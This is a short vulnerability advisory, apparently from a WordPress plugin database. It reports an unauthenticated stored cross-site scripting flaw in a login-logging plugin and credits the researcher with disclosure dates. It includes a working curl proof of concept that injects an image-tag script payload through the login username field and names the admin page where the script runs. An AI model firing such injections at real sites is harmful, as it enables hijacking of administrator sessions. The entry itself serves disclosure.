The plugin does not sanitise and escape the username submitted via the login from when displaying them back in the log dashboard, leading to an unauthenticated Stored Cross-Site scripting
curl 'https://example.com/wp-login.php' --data-raw 'log=a<img src onerror=alert(/XSS/)>&pwd=x&wp-submit=Log+In' The XSS will be trigged in the 'All User' section of the Login Log: https://example.com/wp-admin/users.php?page=crazy-bone%2Fplugin.php&user_id=-1&status
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-31 (about 1 years ago)
2022-01-31 (about 1 years ago)
2022-04-12 (about 9 months ago)